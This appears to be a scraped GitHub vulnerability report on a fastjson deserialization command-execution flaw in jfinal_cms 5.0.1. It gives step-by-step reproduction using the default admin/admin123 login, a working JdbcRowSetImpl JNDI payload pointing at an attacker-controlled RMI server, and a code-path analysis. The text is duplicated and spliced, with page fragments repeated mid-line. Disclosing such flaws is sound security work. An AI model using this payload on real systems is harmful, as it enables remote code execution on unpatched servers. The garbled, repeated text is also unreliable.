Create the config.json file and copy the payload in
Log in to the Backstage management system, select template management
default password:admin/admin123
Click config.json
Click Replace file
Replace with the config.json file containing the payload just created
Visit /ueditor, execute the command to pop up the calculator
http://localhost:8080/jfinal_cms/ueditor
Vulnerability analysis
com.jflyfox.component.controller.Ueditor
The ActionEnter class is instantiated in the index method of the /ueditor route
com.baidu.ueditor.ActionEnter#ActionEnter
The ConfigManager class is instantiated in the constructor of the ActionEnter class
com.baidu.ueditor.ConfigManager#ConfigManager
The construction method of ConfigManager calls initEnv()
com.baidu.ueditor.ConfigManager#initEnv
Call JSONObject.parseObject to parse the file content, and the file content here is controllable, just replace the file content with the payload.
com.baidu.ueditor.ConfigManager
The file comes from WEB-INF/classes/config.json. With any file upload vulnerability in the background, this file can be replaced with a file containing the payload to trigger fastjson deserialization
The text was updated successfully, but these errors were encountered:
Vulnerability summary
A command execution vulnerability exists in jfinal_cms 5.0.1
JDK version requirements:
jfinal_cms version:5.0.1
fastjson version:1.2.28

vulnerability recurrence
JDK version used in the test: JDK8u101
Run the tool on kali, start rmi and ldap services
https://github.com/feihong-cs/JNDIExploit
replace rmi or ldap address in payload:
{ "a":{ "@type":"java.lang.Class", "val":"com.sun.rowset.JdbcRowSetImpl" }, "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://192.168.248.128:1099/6dxg2x", "autoCommit":true } }Create the config.json file and copy the payload in
Log in to the Backstage management system, select template management
default password:admin/admin123
Click config.json

Click Replace file
Replace with the config.json file containing the payload just created

Visit /ueditor, execute the command to pop up the calculator
Vulnerability analysis
com.jflyfox.component.controller.UeditorThe ActionEnter class is instantiated in the index method of the /ueditor route

com.baidu.ueditor.ActionEnter#ActionEnterThe ConfigManager class is instantiated in the constructor of the ActionEnter class

com.baidu.ueditor.ConfigManager#ConfigManagerThe construction method of ConfigManager calls

initEnv()com.baidu.ueditor.ConfigManager#initEnvCall JSONObject.parseObject to parse the file content, and the file content here is controllable, just replace the file content with the payload.

com.baidu.ueditor.ConfigManagerThe file comes from


WEB-INF/classes/config.json. With any file upload vulnerability in the background, this file can be replaced with a file containing the payload to trigger fastjson deserializationThe text was updated successfully, but these errors were encountered: